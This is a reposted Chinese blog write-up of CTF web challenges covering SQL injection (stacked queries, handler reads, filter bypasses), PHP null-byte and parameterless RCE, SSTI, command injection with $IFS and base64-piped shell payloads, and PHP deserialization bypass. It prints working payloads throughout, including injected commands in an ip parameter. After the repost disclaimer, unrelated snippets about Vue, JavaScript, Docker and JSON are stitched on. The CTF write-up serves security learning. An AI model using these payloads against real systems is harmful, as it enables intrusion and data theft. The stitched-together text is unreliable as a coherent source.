如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。

...!! 那么如何查询到数据呢？ select 函数被过滤了，其实mysql的函数有很多 这里通过 MYSQL的预处理语句，使用 : concat（'s','elect',' from 1919810931114514'） 完成绕过 构造pyload： 1';PREPARE test from concat('s','elect',' from 1919810931114514');EXECUTE test; flag{3b3d8fa2-2348-4d6b-81af-017ca90e6c81} [SUCTF 2019]EasySQL 环境我已经启动了 进入题目链接 老套路 先看看源码里面有什么东西 不出意料的什么都没有 但是提示我们它是POST传参 这是一道SQL注入的题目 不管输入什么数字，字母 都是这的 没有回显 但是输入:0没有回显 不知道为啥 而且输入:1' 也不报错 同样是没有回显 尝试注入时 显示Nonono. 也就是说，没有回显，联合查询基本没戏。 好在页面会进行相应的变化，证明注入漏洞肯定是有的。 而且注入点就是这个POST参数框 看了大佬的WP 才想起来 还有堆叠注入 堆叠注入原理 在SQL中，分号（;）是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句，会不会一起执行？因此这个想法也就造就了堆叠注入。而union injection（联合注入）也是将两条语句合并在一起，两者之间有什么区别么？区别就在于union 或者union all执行的语句类型是有限的，可以用来执行查询语句，而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入：1; DELETE FROM products服务器端生成的sql语句为：（因未对输入的参数进行过滤）Select from products where productid=1;DELETE FROM products当执行查询后，第一条显示查询信息，第二条则将整个表进行删除。 1;show databases; 1;show tables; 1;use ctf;show tables; 跑字典时 发现了好多的过滤 哭了 没有办法… 看到上面主要是有两中返回，一种是空白，一种是nonono。 在网上查writeup看到 输入1显示:Array ( [0] => 1 )输入a显示:空白输入所有非0数字都显示:Array ( [0] => 1 )输入所有字母（除过滤的关键词外）都显示空白 可以推测题目应该是用了||符号。 推测出题目应该是select $_post[value] || flag from Flag。 这里 就有一个符号|| 当有一边为数字时 运算结果都为 true 返回1 使用 || 运算符，不在是做或运算 而是作为拼接字符串的作用 在oracle 缺省支持 通过 || 来实现字符串拼接，但在mysql 缺省不支持 需要调整mysql 的sql_mode 模式：pipes_as_concat 来实现oracle 的一些功能。 这个意思是在oracle中 || 是作为字符串拼接，而在mysql中是运算符。 当设置sql_mode为pipes_as_concat的时候，mysql也可以把 || 作为字符串拼接。 修改完后，|| 就会被认为是字符串拼接符 MySQL中sql_mode参数，具体的看这里 解题思路1： payload：,1 查询语句：select ,1||flag from Flag 解题思路2： 堆叠注入，使得sql_mode的值为PIPES_AS_CONCAT payload:1;set sql_mode=PIPES_AS_CONCAT;select 1 解析： 在oracle 缺省支持 通过 ‘ || ’ 来实现字符串拼接。但在mysql 缺省不支持。需要调整mysql 的sql_mode模式：pipes_as_concat 来实现oracle 的一些功能。 flag出来了 头秃 不是很懂 看了好多的wp… [GYCTF2020]Blacklist 进入题目链接 1.注入：1’ 为'闭合 2.看字段：1' order by 2 确认字段为2 3.查看回显:1’ union select 1,2 发现过滤字符 与上面的随便注很像 ，太像了，增加了过滤规则。 修改表名和set均不可用，所以很直接的想到了handler语句。 4.但依旧可以用堆叠注入获取数据库名称、表名、字段。 1';show databases 获取数据库名称1';show tables 获取表名1';show columns from FlagHere ; 或 1';desc FlagHere; 获取字段名 5.接下来用 handler语句读取内容。 1';handler FlagHere open;handler FlagHere read first 直接得到 flag 成功解题。 flag{d0c147ad-1d03-4698-a71c-4fcda3060f17} 补充handler语句相关。 mysql除可使用select查询表中的数据，也可使用handler语句 这条语句使我们能够一行一行的浏览一个表中的数据，不过handler语句并不 具备select语句的所有功能。它是mysql专用的语句,并没有包含到SQL标准中 [GKCTF2020]cve版签到 查看提示 菜鸡的第一步 提示了：cve-2020-7066 赶紧去查了一下 cve-2020-7066PHP 7.2.29之前的7.2.x版本、7.3.16之前的7.3.x版本和7.4.4之前的7.4.x版本中的‘get_headers()’函数存在安全漏洞。攻击者可利用该漏洞造成信息泄露。 描述在低于7.2.29的PHP版本7.2.x，低于7.3.16的7.3.x和低于7.4.4的7.4.x中，将get_headers（）与用户提供的URL一起使用时，如果URL包含零（\ 0）字符，则URL将被静默地截断。这可能会导致某些软件对get_headers（）的目标做出错误的假设，并可能将某些信息发送到错误的服务器。 利用方法 总的来说也就是get_headers()可以被%00截断 进入题目链接 知识点： cve-2020-7066利用 老套路：先F12查看源码 发现提示：Flag in localhost 根据以上 直接上了 直接截断 因为提示host必须以123结尾，这个简单 所以需要将localhost替换为127.0.0.123 成功得到flag flag{bf1243d2-08dd-44ee-afe8-45f58e2d6801} GXYCTF2019禁止套娃 考点： .git源码泄露 无参RCE localeconv() 函数返回一包含本地数字及货币格式信息的数组。scandir() 列出 images 目录中的文件和目录。readfile() 输出一个文件。current() 返回数组中的当前单元, 默认取第一个值。pos() current() 的别名。next() 函数将内部指针指向数组中的下一个元素，并输出。array_reverse()以相反的元素顺序返回数组。highlight_file()打印输出或者返回 filename 文件中语法高亮版本的代码。 具体细节，看这里 进入题目链接 上御剑扫目录 发现是.git源码泄露 上githack补全源码 得到源码 <?phpinclude "flag.php";echo "flag在哪里呢？<br>";if(isset($_GET['exp'])){if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {// echo $_GET['exp'];@eval($_GET['exp']);}else{die("还差一点哦！");} }else{die("再好好想想！");} }else{die("还想读flag，臭弟弟！");} }// highlight_file(__FILE__);?> 既然getshell基本不可能，那么考虑读源码 看源码，flag应该就在flag.php 我们想办法读取 首先需要得到当前目录下的文件 scandir()函数可以扫描当前目录下的文件，例如： <?phpprint_r(scandir('.'));?> 那么问题就是如何构造scandir('.') 这里再看函数： localeconv() 函数返回一包含本地数字及货币格式信息的数组。而数组第一项就是. current() 返回数组中的当前单元, 默认取第一个值。 pos() current() 的别名。 这里还有一个知识点： current(localeconv())永远都是个点 那么就很简单了 print_r(scandir(current(localeconv())));print_r(scandir(pos(localeconv()))); 第二步：读取flag所在的数组 之后我们利用array_reverse() 将数组内容反转一下，利用next()指向flag.php文件==>highlight_file()高亮输出 payload: ?exp=show_source(next(array_reverse(scandir(pos(localeconv()))))); [De1CTF 2019]SSRF Me 首先得到提示 还有源码 进入题目链接 得到一串py 经过整理后 ! /usr/bin/env pythonencoding=utf-8from flask import Flaskfrom flask import requestimport socketimport hashlibimport urllibimport sysimport osimport jsonreload(sys)sys.setdefaultencoding('latin1')app = Flask(__name__)secert_key = os.urandom(16)class Task:def __init__(self, action, param, sign, ip):python得构造方法self.action = actionself.param = paramself.sign = signself.sandbox = md5(ip)if(not os.path.exists(self.sandbox)): SandBox For Remote_Addros.mkdir(self.sandbox)def Exec(self):定义的命令执行函数，此处调用了scan这个自定义的函数result = {}result['code'] = 500if (self.checkSign()):if "scan" in self.action:action要写scantmpfile = open("./%s/result.txt" % self.sandbox, 'w')resp = scan(self.param) 此处是文件读取得注入点if (resp == "Connection Timeout"):result['data'] = respelse:print resp 输出结果tmpfile.write(resp)tmpfile.close()result['code'] = 200if "read" in self.action:action要加readf = open("./%s/result.txt" % self.sandbox, 'r')result['code'] = 200result['data'] = f.read()if result['code'] == 500:result['data'] = "Action Error"else:result['code'] = 500result['msg'] = "Sign Error"return resultdef checkSign(self):if (getSign(self.action, self.param) == self.sign): !!!校验return Trueelse:return Falsegenerate Sign For Action Scan.@app.route("/geneSign", methods=['GET', 'POST']) !!!这个路由用于测试def geneSign():param = urllib.unquote(request.args.get("param", "")) action = "scan"return getSign(action, param)@app.route('/De1ta',methods=['GET','POST'])这个路由是我萌得最终注入点def challenge():action = urllib.unquote(request.cookies.get("action"))param = urllib.unquote(request.args.get("param", ""))sign = urllib.unquote(request.cookies.get("sign"))ip = request.remote_addrif(waf(param)):return "No Hacker!!!!"task = Task(action, param, sign, ip)return json.dumps(task.Exec())@app.route('/')根目录路由，就是显示源代码得地方def index():return open("code.txt","r").read()def scan(param):这是用来扫目录得函数socket.setdefaulttimeout(1)try:return urllib.urlopen(param).read()[:50]except:return "Connection Timeout"def getSign(action, param):!!!这个应该是本题关键点,此处注意顺序先是param后是actionreturn hashlib.md5(secert_key + param + action).hexdigest()def md5(content):return hashlib.md5(content).hexdigest()def waf(param):这个waf比较没用好像check=param.strip().lower()if check.startswith("gopher") or check.startswith("file"):return Trueelse:return Falseif __name__ == '__main__':app.debug = Falseapp.run(host='0.0.0.0') 相关函数 作用 init(self, action, param, …) 构造方法self代表对象,其他是对象的属性 request.args.get(param) 提取get方法传入的，参数名叫param对应得值 request.cookies.get(“action”) 提取cookie信息中的，名为action得对应值 hashlib.md5().hexdigest() hashlib.md5()获取一个md5加密算法对象，hexdigest()是获得加密后的16进制字符串 urllib.unquote(） 将url编码解码 urllib.urlopen() 读取网络文件参数可以是url json.dumps Python 对象编码成 JSON 字符串 这个题先放一下… [极客大挑战 2019]EasySQL 进入题目链接 直接上万能密码 用户随意 admin1' or 1; 得到flag flag{7fc65eb6-985b-494a-8225-de3101a78e89} [极客大挑战 2019]Havefun 进入题目链接 老套路 去F12看看有什么东西 很好 逮住了 获取FLAG的条件是cat=dog，且是get传参 flag就出来了 flag{779b8bac-2d64-4540-b830-1972d70a2db9} [极客大挑战 2019]Secret File 进入题目链接 老套路 先F12查看 发现超链接 直接逮住 既然已经查阅结束了 中间就肯定有一些我们不知道的东西 过去了 上burp看看情况 我们让他挺住 逮住了：secr3t.php 访问一下 简单的绕过 就可以了 成功得到一串字符 进行base解密即可 成功逮住flag flag{ed90509e-d2d1-4161-ae99-74cd27d90ed7} [ACTF2020 新生赛]Include 根据题目信息 是文件包含无疑了 直接点击进来 用php伪协议 绕过就可以了 得到一串编码 base64解密即可 得到flag flag{c09e6921-0c0e-487e-87c9-0937708a78d7} 2018]easy_tornado 都点击一遍 康康 直接filename变量改为：fllllllllllllag 报错了 有提示 render() 是一个渲染函数 具体看这里 就用到SSTI模板注入了 具体看这里 尝试模板注入： /error?msg={ {1} } 发现存在模板注入 md5(cookie_secret+md5(filename)) 分析题目： 1.tornado是一个python的模板，可能会产生SSTI注入漏洞2.flag在/fllllllllllllag中3.render是python中的一个渲染函数，也就是一种模板，通过调用的参数不同，生成不同的网页4.可以推断出filehash的值为md5(cookie_secret+md5(filename)) 根据目前信息，想要得到flag就需要获取cookie_secret 因为tornado存在模版注入漏洞，尝试通过此漏洞获取到所需内容 根据测试页面修改msg得值发现返回值 可以通过msg的值进行修改,而在 taornado框架中存在cookie_secreat 可以通过/error?msg={ {handler.settings} }拿到secreat_cookie 综合以上结果 拿脚本跑一下 得到filehash: ed75a45308da42d3fe98a8f15a2ad36a 一直跑不出来 不知道为啥子 [极客大挑战 2019]LoveSQL 万能密码尝试 直接上万能密码 用户随意 admin1' or 1; 开始正常注入： 查字段：1' order by 3 经过测试 字段为3 查看回显:1’ union select 1,2,3 查数据库 1' union select 1,2,group_concat(schema_name) from information_schema.schemata 查表： [GXYCTF2019]Ping Ping Ping 考察：RCE的防护绕过 直接构造：?ip=127.0.0.1;ls 简单的fuzz一下 就发现=和$没有过滤 所以想到的思路就是使用$IFS$9代替空格，使用拼接变量来拼接出Flag字符串： 构造playload ?ip=127.0.0.1;a=fl;b=ag;cat$IFS$9$a$b 看看他到底过滤了什么：?ip=127.0.0.1;cat$IFS$1index.php 一目了然过滤了啥，flag字眼也过滤了，bash也没了，不过sh没过滤： 继续构造payload： ?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh 查看源码，得到flag flag{1fe312b4-96a0-492d-9b97-040c7e333c1a} [RoarCTF 2019]Easy Calc 进入题目链接 查看源码 发现calc.php 利用PHP的字符串解析特性Bypass，具体看这里 HP需要将所有参数转换为有效的变量名，因此在解析查询字符串时，它会做两件事： 1.删除空白符2.将某些字符转换为下划线（包括空格） scandir()：列出参数目录中的文件和目录 发现/被过滤了 ，可以用chr('47')代替 calc.php? num=1;var_dump(scandir(chr(47))) 这里直接上playload calc.php? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))) flag{76243df6-aecb-4dc5-879e-3964ec7485ee} [极客大挑战 2019]Knife 进入题目链接 根据题目Knife 还有这个一句话木马 猜想尝试用蚁剑连接 测试连接成功 确实是白给了flag [ACTF2020 新生赛]Exec 直接ping 发现有回显 构造playload： 127.0.0.1;cat /flag 成功拿下flag flag{7e582f16-2676-42fa-8b9d-f9d7584096a6} [极客大挑战 2019]PHP 进入题目链接 它提到了备份文件 就肯定是扫目录 把源文件的代码 搞出来 上dirsearch 下载看这里 很简单的使用方法 用来扫目录 -u 指定url -e 指定网站语言 -w 可以加上自己的字典，要带路径 -r 递归跑(查到一个目录后，重复跑) 打开index.php文件 分析这段内容 1.加载了一个class.php文件 2.采用get方式传递一个select参数 3.随后将之反序列化 打开class.php <?phpinclude 'flag.php';error_reporting(0);class Name{private $username = 'nonono';private $password = 'yesyes';public function __construct($username,$password){$this->username = $username;$this->password = $password;}function __wakeup(){$this->username = 'guest';}function __destruct(){if ($this->password != 100) {echo "</br>NO!!!hacker!!!</br>";echo "You name is: ";echo $this->username;echo "</br>";echo "You password is: ";echo $this->password;echo "</br>";die();}if ($this->username === 'admin') {global $flag;echo $flag;}else{echo "</br>hello my friend~~</br>sorry i can't give you the flag!";die();} }}?> 根据代码的意思可以知道，如果password=100，username=admin 在执行_destruct()的时候可以获得flag 构造序列化 <?phpclass Name{private $username = 'nonono';private $password = 'yesyes';public function __construct($username,$password){$this->username = $username;$this->password = $password;} }$a = new Name('admin', 100);var_dump(serialize($a));?> 得到了序列化 O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;} 但是 还有要求 1.跳过__wakeup()函数 在反序列化字符串时，属性个数的值大于实际属性个数时，就可以 2.private修饰符的问题 private 声明的字段为私有字段，只在所声明的类中可见，在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化时，类名和字段名前面都会加上\0的前缀。字符串长度也包括所加前缀的长度 构造最终的playload ?select=O:4:%22Name%22:3:{s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;i:100;} [极客大挑战 2019]Http 进入题目链接 查看 源码 发现了 超链接的标签 说我们不是从https://www.Sycsecret.com访问的 进入http://node3.buuoj.cn:27883/Secret.php 抓包修改一下Referer 执行一下 随后提示我们浏览器需要使用Syclover， 修改一下User-Agent的内容 就拿到flag了 [HCTF 2018]admin 进入题目链接 这道题有三种解法 1.flask session 伪造 2.unicode欺骗 3.条件竞争 发现 登录和注册功能 随意注册一个账号啦 登录进来之后 登录 之后 查看源码 发现提示 猜测 我们登录 admin账号 即可看见flag 在change password页面发现 访问后 取得源码 第一种方法： flask session 伪造 具体，看这里 flask中session是存储在客户端cookie中的，也就是存储在本地。flask仅仅对数据进行了签名。众所周知的是，签名的作用是防篡改，而无法防止被读取。而flask并没有提供加密操作，所以其session的全部内容都是可以在客户端读取的，这就可能造成一些安全问题。 [极客大挑战 2019]BabySQL 进入题目链接 对用户名进行测试 发现有一些关键字被过滤掉了 猜测后端使用replace()函数过滤 11' oorr 1=1 直接尝试双写 万能密码尝试 双写 可以绕过 查看回显： 1' uniunionon selselectect 1,2,3 over！正常 开始注入 爆库 爆列 爆表 爆内容 本篇文章为转载内容。原文链接：https://blog.csdn.net/wo41ge/article/details/109162753。 该文由互联网用户投稿提供，文中观点代表作者本人意见，并不代表本站的立场。 作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。

...前端开发的更多技术和最佳实践。近期，Vue 3.0版本的发布为.vue单文件组件带来了诸多改进和新特性，例如Composition API让组件逻辑的组织更加灵活和可复用，Teleport提供了将组件渲染到DOM特定位置的能力，而< script setup >语法糖更是简化了组件内的脚本编写。 另外，随着微前端架构的兴起，Vue Single-File Components在多团队协作、大型项目管理和代码分割方面的作用日益凸显。比如通过使用Module Federation插件结合Webpack 5，可以实现不同子应用间.vue文件的高效按需加载与共享，大大提升了系统的可维护性和运行性能。 同时，在样式部分，Vue也支持CSS预处理器如Sass、Less，并引入了

...色。特别是在处理大量数据时，如动态生成网页元素内容、构建查询字符串以及进行AJAX请求参数序列化等场景。 最近，随着WebAssembly和高性能JavaScript库的兴起，原生JavaScript性能优化的重要性更为凸显。例如，在Vue 3或React最新版本的应用中，为了提高渲染效率，开发者们更倾向于使用原生JavaScript方法而非框架提供的便捷工具。.join()凭借其高效的内存管理和运行速度，在此类优化实践中发挥了关键作用。 另外，在大数据处理与可视化领域，.join()方法同样被广泛应用。例如，在D3.js库中创建SVG路径时，需要将坐标点数组转换为连续的路径数据字符串，此时.join()就能派上用场，实现高效的数据格式转化。 不仅如此，.join()方法还揭示了JavaScript对Unicode字符集的良好支持，当数组元素包含非ASCII字符时，它依然能准确无误地拼接成字符串，这对于国际化应用开发具有重要意义。 因此，对于前端开发者而言，不仅需要掌握jQuery等库的便捷功能，更要深入了解JavaScript原生API，如.join()这样的基础函数，以应对不断变化的技术趋势和实际应用场景的需求。同时，持续关注ECMAScript新标准的发展，了解并掌握新的字符串处理方式，也是提升开发效能的关键所在。

...的命令。它会输出一个JSON格式的数据，包括虚拟容器的网络配置信息和其他详细信息。 如果您正在使用Docker Compose，可以在docker-compose.yml文件中使用ports关键字来映射端口。例如： ports: - "8080:80" 此配置将将Nginx虚拟容器的80端口转发到主机的8080端口。 除了上述方法，还有其他方式可以从Docker虚拟容器外部接入应用。如果您想深入了解Docker虚拟容器网络和端口转发的更多细节，请查看Docker官方文档。

...解如何将MySQL的数据导出到HTML后，进一步探索数据库与前端交互的实践和最新技术动态将有助于提升开发效率和用户体验。近期，随着Web应用复杂度的增加，数据可视化需求日益增强，各类JavaScript库如React、Vue.js结合现代模板引擎如Pug、Handlebars等提供了更为便捷高效的数据库数据到HTML转换方案。 例如，Next.js框架结合Apollo GraphQL能够实现实时从MySQL或其他数据库获取数据，并无缝渲染至前端界面。开发者可以利用GraphQL的强大查询能力，精确选择需要的数据字段，减少网络传输量，同时提高页面加载速度。 此外，针对大数据处理场景，Apache Superset等开源BI工具也支持直接连接MySQL数据库并生成丰富的交互式HTML报表，满足企业级数据分析和展示需求。 不仅如此，对于数据库内容的安全性和隐私保护，开发者应关注最新的GDPR等相关法规，确保在数据导出过程中遵循数据最小化原则，对敏感信息进行合理脱敏处理，避免在生成的HTML文件中泄露用户隐私。 综上所述，在实际项目中，根据具体业务需求和技术栈选择合适的数据库数据导出及前端展现策略，不仅限于上述提及的技术，更应持续关注领域内的新技术发展和最佳实践，以期达到高效、安全、易用的目标。

JSON（JavaScript Object Notation）作为一种数据传输格式，已经被广泛应用在Web前端开发、后端服务器间数据传输等场景中。JSON是由键值对结构构成的，其中值的包括但不限于文本、数值、实体、集合、逻辑值和null，但是在处理JSON数值时需要注意精确度问题。 { "num": 0.1 } 上面这个JSON实体，我们视为num的值是0.1。然而在JavaScript中采用浮点型数值时，会遭遇很多异常情况。比如： console.log(0.1 + 0.2); // 0.30000000000000004 理论上0.1加上0.2应该等于0.3，但是实际输出的结果是一个接近0.3的数。 这是因为JavaScript使用IEEE 754标准来表示浮点数，而导致精度丢失。 那么在JSON中，如果我们需要精确表示一个小数，该怎么做呢？事实上，有两种做法。 第一种是使用文本，例如： { "num": "0.1" } 这种方式可以保证值的精度，但是会使得操作和计算变复杂。 第二种是使用带精度的数值，例如： { "num": { "value": 0.1, "precision": 2 } } 这里我们使用了一个实体来表示数值和精度。value表示数值，precision表示小数点后有几位。这种方式仍然需要特别处理，但是对于一些需要保持精度的场景，是一种可行的方案。

...用户界面的动态渲染和数据驱动更新，提升了聊天记录加载速度以及整体的流畅度。 同时，随着WebRTC等现代技术的发展，Vue.js也在实时通信、音视频通话等方面展现出了巨大潜力。许多开发者正在结合Vue.js和其他前沿技术打造新一代的实时聊天应用，这些应用不仅具备查看历史聊天记录的功能，还能实现一对一或群组的实时音视频对话。 因此，对于想要深入了解Vue.js在实时交互应用中实践应用的开发者来说，持续关注Vue.js官方发布、阅读相关实战教程、研究诸如Slack等大厂的技术博客，以及了解WebRTC等相关技术的发展趋势，都将是非常有益的延伸阅读方向。通过这些渠道，不仅可以洞悉Vue.js的最新进展和最佳实践，也能更好地借鉴并应用于自己的项目开发中，从而打造出更加高效、易用的聊天应用程序。